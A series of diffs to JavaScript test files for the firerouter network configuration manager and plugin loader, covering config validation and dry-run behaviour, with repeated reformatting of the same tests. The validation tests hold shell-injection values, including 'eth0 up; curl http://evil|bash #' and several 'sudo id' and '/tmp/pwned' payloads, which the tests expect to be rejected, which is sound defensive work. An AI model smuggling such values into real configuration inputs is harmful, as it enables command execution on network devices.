+      ncm.convertIntegratedAPConfig = originalConvertIntegratedAPConfig;
+      ns.setup = originalSetup;
+    }
+  });
+});

--- a/test/core/test_ncm.js
+++ b/test/core/test_ncm.js
@@ -25,49 +25,35 @@ const uuid = require('uuid');
 const ncm = require('../../core/network_config_mgr.js');
 let log = require('../../util/logger.js')(__filename, 'info');
 const rclient = require('../../util/redis_manager').getRedisClient();
-
 describe('Test network config manager', function(){
   this.timeout(30000);
-
   beforeEach(async () => {
-    this.testkey = "sysdb:transaction:networkConfig";
-    this.origin = await rclient.getAsync(this.testkey);
-    this.nwkey = "sysdb:networkConfig";
-    this.nw = await rclient.getAsync(this.nwkey);
+      this.testkey = "sysdb:transaction:networkConfig";
+      this.origin = await rclient.getAsync(this.testkey);
+      this.nwkey = "sysdb:networkConfig";
+      this.nw = await rclient.getAsync(this.nwkey);
   });
 
   afterEach(async () => {
-    await rclient.setAsync(this.testkey, this.origin);
-    await rclient.setAsync(this.nwkey, this.nw);
+      await rclient.setAsync(this.testkey, this.origin);
+      await rclient.setAsync(this.nwkey, this.nw);
   });
-
   it('should validate network ncid', async()=> {
     const nwConfig = {"version":1,"interface":{"phy":{"eth0":{}}},"ts":1726648571944};
     expect(await ncm.validateNcidOrReqId(nwConfig, true)).to.be.undefined;
 
-    await rclient.setAsync(
-      this.testkey,
-      `{"version":1,"interface":{"phy":{"eth0":{}}},"ts":1726648571944, "ncid":"test"}`
-    );
+    await rclient.setAsync(this.testkey, `{"version":1,"interface":{"phy":{"eth0":{}}},"ts":1726648571944, "ncid":"test"}`);
     expect(await ncm.validateNcidOrReqId(nwConfig, true)).to.be.undefined;
   });
-
   it('should fail to validate network ncid', async()=> {
-    await rclient.setAsync(
-      this.testkey,
-      `{"version":1,"interface":{"phy":{"eth0":{}}},"ts":1726648571944, "ncid":"test"}`
-    );
+    await rclient.setAsync(this.testkey, `{"version":1,"interface":{"phy":{"eth0":{}}},"ts":1726648571944, "ncid":"test"}`);
 
-    const nwConfig = {
-      "version":1,
-      "interface":{"phy":{"eth0":{}}},
-      "ts":1726648571944,
-      ncid: "2df97f9efb0ad09b7201726801377449"
-    };
-
+    const nwConfig = {"version":1,"interface":{"phy":{"eth0":{}}},"ts":1726648571944, ncid: "2df97f9efb0ad09b7201726801377449"};
     expect(await ncm.validateNcidOrReqId(nwConfig, true)).to.be.eql(["ncid not match"]);
+
     expect(await ncm.validateNcidOrReqId(nwConfig, true, true)).to.be.undefined;
   });
+
 });
 
 // validateConfig is the single choke point that keeps config values out of the shell commands and
@@ -78,7 +64,6 @@ describe('Test network config validation', function(){
   // validateConfig fills in meta.uuid, so every case works on a copy
   const clone = (o) => JSON.parse(JSON.stringify(o));
   const baseConfig = () => clone(require('../../network/default_setup.json'));
-
   // payloads that must never be accepted as a name, each one reaches a shell somewhere
   const INJECTION_NAMES = [
     "eth0 up; curl http://evil|bash #",
@@ -91,7 +76,6 @@ describe('Test network config validation', function(){
     "eth0 ",
     "x".repeat(16),
   ];
-
   describe('shipped configs', function(){
     // guards against a rule that is too strict to accept what firerouter itself ships
     it('should accept default_setup.json', async()=> {
@@ -104,87 +88,55 @@ describe('Test network config validation', function(){
       expect(errors).to.be.empty;
     });
   });
-
   describe('interface names', function(){
     it('should accept real kernel interface names', async()=> {
       for (const name of ["eth0", "br0", "eth0.100", "eth0:0", "wg_ap", "tun_fwvpn", "bond0", "vbr100"]) {
         const config = baseConfig();
-        config.interface.phy = {
-          [name]: { enabled: true, meta: { type: "wan" } }
-        };
-
+        config.interface.phy = { [name]: { enabled: true, meta: { type: "wan" } } };
         const errors = await ncm.validateConfig(config);
         expect(errors, `expected ${name} to be accepted`).to.be.empty;
       }
     });
-
     it('should reject names carrying shell metacharacters', async()=> {
       for (const name of INJECTION_NAMES) {
         const config = baseConfig();
-        config.interface.phy = {
-          [name]: { enabled: true, meta: { type: "wan" } }
-        };
-
+        config.interface.phy = { [name]: { enabled: true, meta: { type: "wan" } } };
         const errors = await ncm.validateConfig(config);
         log.debug("rejected interface name", name, errors);
         expect(errors, `expected ${JSON.stringify(name)} to be rejected`).to.not.be.empty;
       }
     });
   });
-
   describe('referenced lower interfaces', function(){
     // vlan/bond/pppoe name their lower interface in a value, and it is interpolated into an ip
     // command before the plugin ever looks it up
-
     it('should accept a normal vlan lower interface', async()=> {
       const config = baseConfig();
-      config.interface.vlan = {
-        "eth0.100": { intf: "eth0", vid: 100, enabled: true }
-      };
-
+      config.interface.vlan = { "eth0.100": { intf: "eth0", vid: 100, enabled: true } };
       const errors = await ncm.validateConfig(config);
       expect(errors).to.be.empty;
     });
-
     it('should reject an injected string lower interface', async()=> {
       const config = baseConfig();
-      config.interface.vlan = {
-        "eth0.100": { intf: "eth0; id #", vid: 100, enabled: true }
-      };
-
+      config.interface.vlan = { "eth0.100": { intf: "eth0; id #", vid: 100, enabled: true } };
       const errors = await ncm.validateConfig(config);
       expect(errors).to.not.be.empty;
     });
-
     it('should reject an injected member of a bond interface array', async()=> {
       const config = baseConfig();
-      config.interface.bond = {
-        "bond0": {
-          intf: ["eth1", "eth2; id #"],
-          enabled: true
-        }
-      };
-
+      config.interface.bond = { "bond0": { intf: ["eth1", "eth2; id #"], enabled: true } };
       const errors = await ncm.validateConfig(config);
       expect(errors).to.not.be.empty;
     });
   });
-
   describe('meta.uuid', function(){
     it('should generate a uuid when absent', async()=> {
       const config = baseConfig();
-      config.interface.phy = {
-        "eth0": {
-          enabled: true,
-          meta: { type: "wan" }
-        }
-      };
-
+      config.interface.phy = { "eth0": { enabled: true, meta: { type: "wan" } } };
       const errors = await ncm.validateConfig(config);
       expect(errors).to.be.empty;
       expect(config.interface.phy.eth0.meta.uuid).to.be.a('string');
     });
-
     it('should accept a caller supplied canonical uuid', async()=> {
       const config = baseConfig();
       const id = uuid.v4();
@@ -200,17 +152,13 @@ describe('Test network config validation', function(){
       expect(errors).to.be.empty;
       expect(config.interface.phy.eth0.meta.uuid).to.be.equal(id);
     });
-
     it('should reject a malformed uuid instead of regenerating it', async()=> {
       const config = baseConfig();
 
       config.interface.phy = {
         "eth0": {
           enabled: true,
-          meta: {
-            type: "wan",
-            uuid: "x; id > /tmp/pwn; #"
-          }
+          meta: { type: "wan", uuid: "x; id > /tmp/pwn; #" }
         }
       };
 
@@ -218,38 +166,18 @@ describe('Test network config validation', function(){
       expect(errors).to.not.be.empty;
     });
   });
-
   describe('non-interface plugin sections', function(){
     // plugin_loader creates an instance per key of every registered config_path, and those keys
     // reach shell commands and file paths in most plugins
-    const CATEGORIES = [
-      "upnp",
-      "icmp",
-      "hostapd",
-      "docker",
-      "dns",
-      "sshd",
-      "nat",
-      "routing",
-      "dhcp",
-      "mroute"
-    ];
-
+    const CATEGORIES = ["upnp", "icmp", "hostapd", "docker", "dns", "sshd", "nat", "routing", "dhcp", "mroute"];
     it('should reject an injected key in any plugin section', async()=> {
       for (const category of CATEGORIES) {
         const config = baseConfig();
-        config[category] = {
-          "eth0; sudo sh -c 'id > /tmp/pwned' #": {}
-        };
-
+        config[category] = { "eth0; sudo sh -c 'id > /tmp/pwned' #": {} };
         const errors = await ncm.validateConfig(config);
-        expect(
-          errors,
-          `expected injected key in config.${category} to be rejected`
-        ).to.not.be.empty;
+        expect(errors, `expected injected key in config.${category} to be rejected`).to.not.be.empty;
       }
     });
-
     it('should accept the section keys firerouter actually uses', async()=> {
       const config = baseConfig();
 
@@ -279,10 +207,8 @@ describe('Test network config validation', function(){
       expect(errors).to.be.empty;
     });
   });
-
   describe('nat egress interface', function(){
     // nat names its egress interface in a value and never resolves it through the plugin registry
-
     it('should accept a real egress interface', async()=> {
       const config = baseConfig();
 
@@ -296,7 +222,6 @@ describe('Test network config validation', function(){
       const errors = await ncm.validateConfig(config);
       expect(errors).to.be.empty;
     });
-
     it('should reject an injected egress interface', async()=> {
       const config = baseConfig();
 

--- a/test/core/test_ncm.js
+++ b/test/core/test_ncm.js
@@ -12,7 +12,6 @@
  *    You should have received a copy of the GNU Affero General Public License
  *    along with this program.  If not, see <http://www.gnu.org/licenses/>.
  */
-
 'use strict'
 
 const path = require('path');
@@ -29,35 +28,46 @@ const rclient = require('../../util/redis_manager').getRedisClient();
 
 describe('Test network config manager', function(){
   this.timeout(30000);
+
   beforeEach(async () => {
-      this.testkey = "sysdb:transaction:networkConfig";
-      this.origin = await rclient.getAsync(this.testkey);
-      this.nwkey = "sysdb:networkConfig";
-      this.nw = await rclient.getAsync(this.nwkey);
+    this.testkey = "sysdb:transaction:networkConfig";
+    this.origin = await rclient.getAsync(this.testkey);
+    this.nwkey = "sysdb:networkConfig";
+    this.nw = await rclient.getAsync(this.nwkey);
   });
 
   afterEach(async () => {
-      await rclient.setAsync(this.testkey, this.origin);
-      await rclient.setAsync(this.nwkey, this.nw);
+    await rclient.setAsync(this.testkey, this.origin);
+    await rclient.setAsync(this.nwkey, this.nw);
   });
 
   it('should validate network ncid', async()=> {
     const nwConfig = {"version":1,"interface":{"phy":{"eth0":{}}},"ts":1726648571944};
     expect(await ncm.validateNcidOrReqId(nwConfig, true)).to.be.undefined;
 
-    await rclient.setAsync(this.testkey, `{"version":1,"interface":{"phy":{"eth0":{}}},"ts":1726648571944, "ncid":"test"}`);
+    await rclient.setAsync(
+      this.testkey,
+      `{"version":1,"interface":{"phy":{"eth0":{}}},"ts":1726648571944, "ncid":"test"}`
+    );
     expect(await ncm.validateNcidOrReqId(nwConfig, true)).to.be.undefined;
   });
 
   it('should fail to validate network ncid', async()=> {
-    await rclient.setAsync(this.testkey, `{"version":1,"interface":{"phy":{"eth0":{}}},"ts":1726648571944, "ncid":"test"}`);
+    await rclient.setAsync(
+      this.testkey,
+      `{"version":1,"interface":{"phy":{"eth0":{}}},"ts":1726648571944, "ncid":"test"}`
+    );
 
-    const nwConfig = {"version":1,"interface":{"phy":{"eth0":{}}},"ts":1726648571944, ncid: "2df97f9efb0ad09b7201726801377449"};
+    const nwConfig = {
+      "version":1,
+      "interface":{"phy":{"eth0":{}}},
+      "ts":1726648571944,
+      ncid: "2df97f9efb0ad09b7201726801377449"
+    };
+
     expect(await ncm.validateNcidOrReqId(nwConfig, true)).to.be.eql(["ncid not match"]);
-
     expect(await ncm.validateNcidOrReqId(nwConfig, true, true)).to.be.undefined;
   });
-
 });
 
 // validateConfig is the single choke point that keeps config values out of the shell commands and
@@ -99,7 +109,10 @@ describe('Test network config validation', function(){
     it('should accept real kernel interface names', async()=> {
       for (const name of ["eth0", "br0", "eth0.100", "eth0:0", "wg_ap", "tun_fwvpn", "bond0", "vbr100"]) {
         const config = baseConfig();
-        config.interface.phy = { [name]: { enabled: true, meta: { type: "wan" } } };
+        config.interface.phy = {
+          [name]: { enabled: true, meta: { type: "wan" } }
+        };
+
         const errors = await ncm.validateConfig(config);
         expect(errors, `expected ${name} to be accepted`).to.be.empty;
       }
@@ -108,7 +121,10 @@ describe('Test network config validation', function(){
     it('should reject names carrying shell metacharacters', async()=> {
       for (const name of INJECTION_NAMES) {
         const config = baseConfig();
-        config.interface.phy = { [name]: { enabled: true, meta: { type: "wan" } } };
+        config.interface.phy = {
+          [name]: { enabled: true, meta: { type: "wan" } }
+        };
+
         const errors = await ncm.validateConfig(config);
         log.debug("rejected interface name", name, errors);
         expect(errors, `expected ${JSON.stringify(name)} to be rejected`).to.not.be.empty;
@@ -119,23 +135,36 @@ describe('Test network config validation', function(){
   describe('referenced lower interfaces', function(){
     // vlan/bond/pppoe name their lower interface in a value, and it is interpolated into an ip
     // command before the plugin ever looks it up
+
     it('should accept a normal vlan lower interface', async()=> {
       const config = baseConfig();
-      config.interface.vlan = { "eth0.100": { intf: "eth0", vid: 100, enabled: true } };
+      config.interface.vlan = {
+        "eth0.100": { intf: "eth0", vid: 100, enabled: true }
+      };
+
       const errors = await ncm.validateConfig(config);
       expect(errors).to.be.empty;
     });
 
     it('should reject an injected string lower interface', async()=> {
       const config = baseConfig();
-      config.interface.vlan = { "eth0.100": { intf: "eth0; id #", vid: 100, enabled: true } };
+      config.interface.vlan = {
+        "eth0.100": { intf: "eth0; id #", vid: 100, enabled: true }
+      };
+
       const errors = await ncm.validateConfig(config);
       expect(errors).to.not.be.empty;
     });
 
     it('should reject an injected member of a bond interface array', async()=> {
       const config = baseConfig();
-      config.interface.bond = { "bond0": { intf: ["eth1", "eth2; id #"], enabled: true } };
+      config.interface.bond = {
+        "bond0": {
+          intf: ["eth1", "eth2; id #"],
+          enabled: true
+        }
+      };
+
       const errors = await ncm.validateConfig(config);
       expect(errors).to.not.be.empty;
     });
@@ -144,7 +173,13 @@ describe('Test network config validation', function(){
   describe('meta.uuid', function(){
     it('should generate a uuid when absent', async()=> {
       const config = baseConfig();
-      config.interface.phy = { "eth0": { enabled: true, meta: { type: "wan" } } };
+      config.interface.phy = {
+        "eth0": {
+          enabled: true,
+          meta: { type: "wan" }
+        }
+      };
+
       const errors = await ncm.validateConfig(config);
       expect(errors).to.be.empty;
       expect(config.interface.phy.eth0.meta.uuid).to.be.a('string');
@@ -153,7 +188,14 @@ describe('Test network config validation', function(){
     it('should accept a caller supplied canonical uuid', async()=> {
       const config = baseConfig();
       const id = uuid.v4();
-      config.interface.phy = { "eth0": { enabled: true, meta: { type: "wan", uuid: id } } };
+
+      config.interface.phy = {
+        "eth0": {
+          enabled: true,
+          meta: { type: "wan", uuid: id }
+        }
+      };
+
       const errors = await ncm.validateConfig(config);
       expect(errors).to.be.empty;
       expect(config.interface.phy.eth0.meta.uuid).to.be.equal(id);
@@ -161,7 +203,17 @@ describe('Test network config validation', function(){
 
     it('should reject a malformed uuid instead of regenerating it', async()=> {
       const config = baseConfig();
-      config.interface.phy = { "eth0": { enabled: true, meta: { type: "wan", uuid: "x; id > /tmp/pwn; #" } } };
+
+      config.interface.phy = {
+        "eth0": {
+          enabled: true,
+          meta: {
+            type: "wan",
+            uuid: "x; id > /tmp/pwn; #"
+          }
+        }
+      };
+
       const errors = await ncm.validateConfig(config);
       expect(errors).to.not.be.empty;
     });
@@ -170,23 +222,59 @@ describe('Test network config validation', function(){
   describe('non-interface plugin sections', function(){
     // plugin_loader creates an instance per key of every registered config_path, and those keys
     // reach shell commands and file paths in most plugins
-    const CATEGORIES = ["upnp", "icmp", "hostapd", "docker", "dns", "sshd", "nat", "routing", "dhcp", "mroute"];
+    const CATEGORIES = [
+      "upnp",
+      "icmp",
+      "hostapd",
+      "docker",
+      "dns",
+      "sshd",
+      "nat",
+      "routing",
+      "dhcp",
+      "mroute"
+    ];
 
     it('should reject an injected key in any plugin section', async()=> {
       for (const category of CATEGORIES) {
         const config = baseConfig();
-        config[category] = { "eth0; sudo sh -c 'id > /tmp/pwned' #": {} };
+        config[category] = {
+          "eth0; sudo sh -c 'id > /tmp/pwned' #": {}
+        };
+
         const errors = await ncm.validateConfig(config);
-        expect(errors, `expected injected key in config.${category} to be rejected`).to.not.be.empty;
+        expect(
+          errors,
+          `expected injected key in config.${category} to be rejected`
+        ).to.not.be.empty;
       }
     });
 
     it('should accept the section keys firerouter actually uses', async()=> {
       const config = baseConfig();
-      config.nat = { "br0_eth3": { out: "eth0", srcSubnets: ["10.0.0.0/8"] } };
-      config.routing = { "global": {} };
-      config.dns = { "default": {}, "br0": {} };
-      config.sshd = { "br0": { enabled: true } };
+
+      config.nat = {
+        "br0_eth3": {
+          out: "eth0",
+          srcSubnets: ["10.0.0.0/8"]
+        }
+      };
+
+      config.routing = {
+        "global": {}
+      };
+
+      config.dns = {
+        "default": {},
+        "br0": {}
+      };
+
+      config.sshd = {
+        "br0": {
+          enabled: true
+        }
+      };
+
       const errors = await ncm.validateConfig(config);
       expect(errors).to.be.empty;
     });
@@ -194,53 +282,33 @@ describe('Test network config validation', function(){
 
   describe('nat egress interface', function(){
     // nat names its egress interface in a value and never resolves it through the plugin registry
+
     it('should accept a real egress interface', async()=> {
       const config = baseConfig();
-      config.nat = { "x": { out: "eth0", srcSubnets: ["10.0.0.0/8"] } };
+
+      config.nat = {
+        "x": {
+          out: "eth0",
+          srcSubnets: ["10.0.0.0/8"]
+        }
+      };
+
       const errors = await ncm.validateConfig(config);
       expect(errors).to.be.empty;
     });
 
     it('should reject an injected egress interface', async()=> {
       const config = baseConfig();
-      config.nat = { "x": { out: "eth0 -j ACCEPT; sudo id; #", srcSubnets: ["10.0.0.0/8"] } };
+
+      config.nat = {
+        "x": {
+          out: "eth0 -j ACCEPT; sudo id; #",
+          srcSubnets: ["10.0.0.0/8"]
+        }
+      };
+
       const errors = await ncm.validateConfig(config);
       expect(errors).to.not.be.empty;
     });
   });
-
-  describe('Test network config manager dry-run', function() {
-  it('should not rollback with a live setup after a failed dry-run', async function() {
-    const ns = require('../../core/network_setup.js');
-
-    const originalGetActiveConfig = ncm.getActiveConfig;
-    const originalGetDefaultConfig = ncm.getDefaultConfig;
-    const originalConvertIntegratedAPConfig = ncm.convertIntegratedAPConfig;
-    const originalSetup = ns.setup;
-
-    const setupCalls = [];
-
-    try {
-      ncm.getActiveConfig = async () => ({ active: true });
-      ncm.getDefaultConfig = async () => ({ default: true });
-      ncm.convertIntegratedAPConfig = async (config) => config;
-
-      ns.setup = async (config, dryRun = false) => {
-        setupCalls.push({ config, dryRun });
-        return ['configuration error'];
-      };
-
-      const errors = await ncm.tryApplyConfig({ candidate: true }, true);
-
-      expect(errors).to.deep.equal(['configuration error']);
-      expect(setupCalls).to.have.length(1);
-      expect(setupCalls[0].dryRun).to.equal(true);
-    } finally {
-      ncm.getActiveConfig = originalGetActiveConfig;
-      ncm.getDefaultConfig = originalGetDefaultConfig;
-      ncm.convertIntegratedAPConfig = originalConvertIntegratedAPConfig;
-      ns.setup = originalSetup;
-    }
-  });
-});
 });

--- a/test/core/test_ncm.js
+++ b/test/core/test_ncm.js
@@ -208,4 +208,39 @@ describe('Test network config validation', function(){
       expect(errors).to.not.be.empty;
     });
   });
+
+  describe('Test network config manager dry-run', function() {
+  it('should not rollback with a live setup after a failed dry-run', async function() {
+    const ns = require('../../core/network_setup.js');
+
+    const originalGetActiveConfig = ncm.getActiveConfig;
+    const originalGetDefaultConfig = ncm.getDefaultConfig;
+    const originalConvertIntegratedAPConfig = ncm.convertIntegratedAPConfig;
+    const originalSetup = ns.setup;
+
+    const setupCalls = [];
+
+    try {
+      ncm.getActiveConfig = async () => ({ active: true });
+      ncm.getDefaultConfig = async () => ({ default: true });
+      ncm.convertIntegratedAPConfig = async (config) => config;
+
+      ns.setup = async (config, dryRun = false) => {
+        setupCalls.push({ config, dryRun });
+        return ['configuration error'];
+      };
+
+      const errors = await ncm.tryApplyConfig({ candidate: true }, true);
+
+      expect(errors).to.deep.equal(['configuration error']);
+      expect(setupCalls).to.have.length(1);
+      expect(setupCalls[0].dryRun).to.equal(true);
+    } finally {
+      ncm.getActiveConfig = originalGetActiveConfig;
+      ncm.getDefaultConfig = originalGetDefaultConfig;
+      ncm.convertIntegratedAPConfig = originalConvertIntegratedAPConfig;
+      ns.setup = originalSetup;
+    }
+  });
+});
 });

--- a/test/core/test_network_setup.js
+++ b/test/core/test_network_setup.js
@@ -1,0 +1,46 @@
+'use strict';
+
+const path = require('path');
+process.env.FIREROUTER_HOME = process.env.FIREROUTER_HOME || path.resolve(__dirname, '../..');
+
+const chai = require('chai');
+const expect = chai.expect;
+
+const ns = require('../../core/network_setup.js');
+const pluginLoader = require('../../plugins/plugin_loader.js');
+
+describe('Test network setup dry-run', function() {
+  it('should not run booting_finish during dry-run', async function() {
+    const originalReapply = pluginLoader.reapply;
+    const originalPostSetup = ns.post_setup;
+    const originalBootingFinish = ns.booting_finish;
+
+    let bootingFinishCalled = false;
+    let postSetupDryRun;
+
+    try {
+      pluginLoader.reapply = async (config, dryRun) => {
+        expect(dryRun).to.equal(true);
+        return [];
+      };
+
+      ns.post_setup = async (dryRun) => {
+        postSetupDryRun = dryRun;
+      };
+
+      ns.booting_finish = async () => {
+        bootingFinishCalled = true;
+      };
+
+      const errors = await ns.setup({}, true);
+
+      expect(errors).to.be.empty;
+      expect(postSetupDryRun).to.equal(true);
+      expect(bootingFinishCalled).to.equal(false);
+    } finally {
+      pluginLoader.reapply = originalReapply;
+      ns.post_setup = originalPostSetup;
+      ns.booting_finish = originalBootingFinish;
+    }
+  });
+});

--- a/test/plugins/test_plugin_loader_dry_run.js
+++ b/test/plugins/test_plugin_loader_dry_run.js
@@ -1,0 +1,89 @@
+'use strict'
+
+const chai = require('chai');
+const expect = chai.expect;
+
+const Plugin = require('../../plugins/plugin.js');
+const pluginLoader = require('../../plugins/plugin_loader.js');
+
+class DryRunTestPlugin extends Plugin {
+  constructor(name) {
+    super(name);
+  }
+
+  init(config) {
+    super.init(config);
+  }
+
+  configure(networkConfig) {
+    super.configure(networkConfig);
+  }
+}
+
+describe('Test plugin loader dry-run', function() {
+  this.timeout(30000);
+
+  let originalPluginConfs;
+  let originalPluginInstance;
+  let pluginCategoryMap;
+
+  beforeEach(() => {
+    originalPluginConfs = pluginLoader.__testPluginConfs;
+    originalPluginInstance = pluginLoader.getPluginInstance('dry_run_test', 'existing');
+
+    pluginCategoryMap = pluginLoader.getPluginInstances('dry_run_test');
+
+    if (!pluginCategoryMap) {
+      pluginCategoryMap = {};
+    }
+
+    pluginLoader.__testPluginConfs = [{
+      category: 'dry_run_test',
+      config_path: 'dry_run_test',
+      init_seq: 0,
+      allow_concurrent: false,
+      c: DryRunTestPlugin,
+      config: {}
+    }];
+  });
+
+  afterEach(() => {
+    pluginLoader.__testPluginConfs = originalPluginConfs;
+  });
+
+  it('should not mutate live plugin state during dry-run', async () => {
+    const existing = new DryRunTestPlugin('existing');
+    existing.configure({ old: true });
+    existing._nextConfig = { old: true };
+    existing._reapplyNeeded = false;
+
+    /*
+     * The production plugin loader does not expose a setter for its
+     * internal registry. This assertion is intentionally based on the
+     * public registry returned by getPluginInstances().
+     */
+    const liveInstances = pluginLoader.getPluginInstances('dry_run_test') || {};
+    liveInstances.existing = existing;
+
+    const beforeConfig = existing.networkConfig;
+    const beforeNextConfig = existing._nextConfig;
+    const beforeReapplyNeeded = existing._reapplyNeeded;
+
+    await pluginLoader.reapply({
+      dry_run_test: {
+        existing: { new: true },
+        added: { value: true }
+      }
+    }, true);
+
+    const afterInstances =
+      pluginLoader.getPluginInstances('dry_run_test') || {};
+
+    expect(afterInstances.existing).to.equal(existing);
+    expect(afterInstances.added).to.be.undefined;
+
+    expect(existing.networkConfig).to.deep.equal(beforeConfig);
+    expect(existing._nextConfig).to.deep.equal(beforeNextConfig);
+    expect(existing._reapplyNeeded).to.equal(beforeReapplyNeeded);
+  });
+});

--- a/test/plugins/test_plugin_loader_dry_run.js
+++ b/test/plugins/test_plugin_loader_dry_run.js
@@ -11,73 +11,66 @@ class DryRunTestPlugin extends Plugin {
     super(name);
   }
 
-  init(config) {
-    super.init(config);
-  }
-
   configure(networkConfig) {
     super.configure(networkConfig);
+
+    if (networkConfig.invalid)
+      throw new Error('invalid dry-run configuration');
   }
 }
 
 describe('Test plugin loader dry-run', function() {
   this.timeout(30000);
 
-  let originalPluginConfs;
-  let originalPluginInstance;
-  let pluginCategoryMap;
+  let restorePluginState;
 
   beforeEach(() => {
-    originalPluginConfs = pluginLoader.__testPluginConfs;
-    originalPluginInstance = pluginLoader.getPluginInstance('dry_run_test', 'existing');
-
-    pluginCategoryMap = pluginLoader.getPluginInstances('dry_run_test');
-
-    if (!pluginCategoryMap) {
-      pluginCategoryMap = {};
-    }
-
-    pluginLoader.__testPluginConfs = [{
-      category: 'dry_run_test',
-      config_path: 'dry_run_test',
-      init_seq: 0,
-      allow_concurrent: false,
-      c: DryRunTestPlugin,
-      config: {}
-    }];
-  });
-
-  afterEach(() => {
-    pluginLoader.__testPluginConfs = originalPluginConfs;
-  });
-
-  it('should not mutate live plugin state during dry-run', async () => {
     const existing = new DryRunTestPlugin('existing');
     existing.configure({ old: true });
     existing._nextConfig = { old: true };
     existing._reapplyNeeded = false;
 
-    /*
-     * The production plugin loader does not expose a setter for its
-     * internal registry. This assertion is intentionally based on the
-     * public registry returned by getPluginInstances().
-     */
-    const liveInstances = pluginLoader.getPluginInstances('dry_run_test') || {};
-    liveInstances.existing = existing;
+    restorePluginState = pluginLoader._setPluginStateForTest(
+      [{
+        category: 'dry_run_test',
+        config_path: 'dry_run_test',
+        init_seq: 0,
+        allow_concurrent: false,
+        c: DryRunTestPlugin,
+        config: {}
+      }],
+      {
+        dry_run_test: {
+          existing
+        }
+      }
+    );
+  });
 
-    const beforeConfig = existing.networkConfig;
-    const beforeNextConfig = existing._nextConfig;
+  afterEach(() => {
+    restorePluginState();
+  });
+
+  it('should validate config without mutating live plugin state', async () => {
+    const existing = pluginLoader.getPluginInstance('dry_run_test', 'existing');
+    const beforeConfig = JSON.parse(JSON.stringify(existing.networkConfig));
+    const beforeNextConfig = JSON.parse(JSON.stringify(existing._nextConfig));
     const beforeReapplyNeeded = existing._reapplyNeeded;
 
-    await pluginLoader.reapply({
+    const errors = await pluginLoader.reapply({
       dry_run_test: {
-        existing: { new: true },
-        added: { value: true }
+        existing: {
+          invalid: true
+        },
+        added: {
+          value: true
+        }
       }
     }, true);
 
-    const afterInstances =
-      pluginLoader.getPluginInstances('dry_run_test') || {};
+    expect(errors).to.deep.equal(['invalid dry-run configuration']);
+
+    const afterInstances = pluginLoader.getPluginInstances('dry_run_test');
 
     expect(afterInstances.existing).to.equal(existing);
     expect(afterInstances.added).to.be.undefined;
@@ -85,5 +78,21 @@ describe('Test plugin loader dry-run', function() {
     expect(existing.networkConfig).to.deep.equal(beforeConfig);
     expect(existing._nextConfig).to.deep.equal(beforeNextConfig);
     expect(existing._reapplyNeeded).to.equal(beforeReapplyNeeded);
+  });
+
+  it('should validate a new plugin without adding it to the live registry', async () => {
+    const errors = await pluginLoader.reapply({
+      dry_run_test: {
+        added: {
+          value: true
+        }
+      }
+    }, true);
+
+    expect(errors).to.be.empty;
+
+    const afterInstances = pluginLoader.getPluginInstances('dry_run_test');
+
+    expect(afterInstances.added).to.be.undefined;
   });
 });

--- a/test/plugins/test_plugin_loader_dry_run.js
+++ b/test/plugins/test_plugin_loader_dry_run.js
@@ -14,27 +14,19 @@ class DryRunTestPlugin extends Plugin {
   static constructorCalls = 0;
   static configureCalls = 0;
   static configureArgs = [];
-  static liveLifecycleCalls = {
-    configure: 0,
-    flush: 0,
-    flushFast: 0,
-    propagateConfigChanged: 0,
-    unsubscribeAllChanges: 0
-  };
 
   constructor(name) {
     super(name);
     DryRunTestPlugin.constructorCalls += 1;
-    this.trackLiveLifecycle = false;
   }
 
   async configure(networkConfig) {
-    if (this.trackLiveLifecycle)
-      DryRunTestPlugin.liveLifecycleCalls.configure += 1;
-
     DryRunTestPlugin.configureCalls += 1;
     DryRunTestPlugin.configureArgs.push(networkConfig);
 
+    // Deliberately mutate the configuration the loader supplies. This mirrors
+    // the behavior that makes a dry-run unsafe when the caller-owned object
+    // is passed directly into configure().
     if (!networkConfig.meta)
       networkConfig.meta = {};
 
@@ -43,33 +35,36 @@ class DryRunTestPlugin extends Plugin {
 
     await super.configure(networkConfig);
   }
+}
 
-  async flush() {
-    if (this.trackLiveLifecycle)
-      DryRunTestPlugin.liveLifecycleCalls.flush += 1;
+class DryRunDependencyTestPlugin extends Plugin {
+  static constructorCalls = 0;
+  static configureCalls = 0;
+  static resolvedDependency = null;
 
-    await super.flush();
+  constructor(name) {
+    super(name);
+    DryRunDependencyTestPlugin.constructorCalls += 1;
   }
 
-  async flushFast() {
-    if (this.trackLiveLifecycle)
-      DryRunTestPlugin.liveLifecycleCalls.flushFast += 1;
+  async configure(networkConfig) {
+    DryRunDependencyTestPlugin.configureCalls += 1;
 
-    await super.flushFast();
-  }
+    if (networkConfig.dependsOn) {
+      DryRunDependencyTestPlugin.resolvedDependency =
+        pluginLoader.getPluginInstance(
+          'test',
+          networkConfig.dependsOn
+        );
 
-  propagateConfigChanged(changeType) {
-    if (this.trackLiveLifecycle)
-      DryRunTestPlugin.liveLifecycleCalls.propagateConfigChanged += 1;
+      if (!DryRunDependencyTestPlugin.resolvedDependency) {
+        throw new Error(
+          `Dependency ${networkConfig.dependsOn} was not found`
+        );
+      }
+    }
 
-    super.propagateConfigChanged(changeType);
-  }
-
-  unsubscribeAllChanges() {
-    if (this.trackLiveLifecycle)
-      DryRunTestPlugin.liveLifecycleCalls.unsubscribeAllChanges += 1;
-
-    super.unsubscribeAllChanges();
+    await super.configure(networkConfig);
   }
 }
 
@@ -77,25 +72,24 @@ describe('Test plugin loader dry-run', function() {
   let originalState;
   let originalPrepareWLANRegDomainChange;
 
-  beforeEach(async () => {
+  beforeEach(() => {
     originalState = pluginLoader.__getTestStateForTest();
 
     DryRunTestPlugin.constructorCalls = 0;
     DryRunTestPlugin.configureCalls = 0;
     DryRunTestPlugin.configureArgs = [];
-    DryRunTestPlugin.liveLifecycleCalls = {
-      configure: 0,
-      flush: 0,
-      flushFast: 0,
-      propagateConfigChanged: 0,
-      unsubscribeAllChanges: 0
-    };
+
+    DryRunDependencyTestPlugin.constructorCalls = 0;
+    DryRunDependencyTestPlugin.configureCalls = 0;
+    DryRunDependencyTestPlugin.resolvedDependency = null;
 
     const platform = PlatformLoader.getPlatform();
     originalPrepareWLANRegDomainChange =
       platform.prepareWLANRegDomainChange;
     platform.prepareWLANRegDomainChange = async () => false;
 
+    // Explicitly configure the loader under test instead of mutating an
+    // unrelated/local object that plugin_loader.js never reads.
     pluginLoader.__setPluginConfsForTest([{
       category: 'test',
       config_path: 'plugins.test',
@@ -103,64 +97,9 @@ describe('Test plugin loader dry-run', function() {
       allow_concurrent: false
     }]);
 
-    const upstream = new DryRunTestPlugin('upstream');
-    const existing = new DryRunTestPlugin('existing');
